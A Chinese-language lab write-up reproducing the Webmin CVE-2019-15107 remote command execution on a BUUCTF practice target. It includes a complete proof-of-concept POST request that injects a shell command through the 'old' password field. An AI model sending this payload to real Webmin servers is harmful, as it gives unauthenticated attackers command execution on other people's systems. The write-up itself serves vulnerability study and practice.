【RCE | BUUCTF】CVE-2019-15107 Webmin远程代码执行漏洞复现

漏洞简介

Webmin 是一个用于管理类 Unix 系统的管理配置工具,具有 Web 页面。在其找回密码页面中,存在一处无需权限的命令注入漏洞,通过这个漏洞攻击者即可以执行任意系统命令。

漏洞靶场

BUUCTF 的 Real 分类下,[Webmin]CVE-2019-15107 模块。

【RCE | BUUCTF】CVE-2019-15107 Webmin远程代码执行漏洞复现

复现过程

直接进入提示内容如下:

【RCE | BUUCTF】CVE-2019-15107 Webmin远程代码执行漏洞复现

在 URl 地址栏前面增加 https:// 即可:

【RCE | BUUCTF】CVE-2019-15107 Webmin远程代码执行漏洞复现

使用 BurpSuite 对该页面进行抓包,将数据包发送到 Repeater,然后使用下面的 POC:

POST /password_change.cgi HTTP/1.1
Host: node4.buuoj.cn:28720
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Cookie: redirect=1; testing=1; sid=x; sessiontest=1
Referer: https://node4.buuoj.cn:28720/session_login.cgi
Content-Type: application/x-www-form-urlencoded
Content-Length: 60

user=rootxx&pam=&expired=2&old=test|id&new1=test2&new2=test2

注意:将 Host 和 Referer 中的地址更改为自己的实际地址。

在返回包中发现了内容:

【RCE | BUUCTF】CVE-2019-15107 Webmin远程代码执行漏洞复现

使用 pwd 命令,查看当前所在的目录:

【RCE | BUUCTF】CVE-2019-15107 Webmin远程代码执行漏洞复现

遇到的问题 在尝试向目录中写入 phpinfo 后,无法通过 URL 加载出页面,并且还尝试了手动翻看目录查找 flag,也都没有找到,只能作罢。
上一篇:[BUUCTF-pwn]——jarvisoj_level2


下一篇:VC中怎么设置文件的版本信息?